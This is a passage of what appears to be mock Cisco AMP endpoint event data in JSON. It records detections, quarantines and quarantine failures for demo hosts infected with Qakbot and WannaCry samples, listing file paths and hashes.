95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
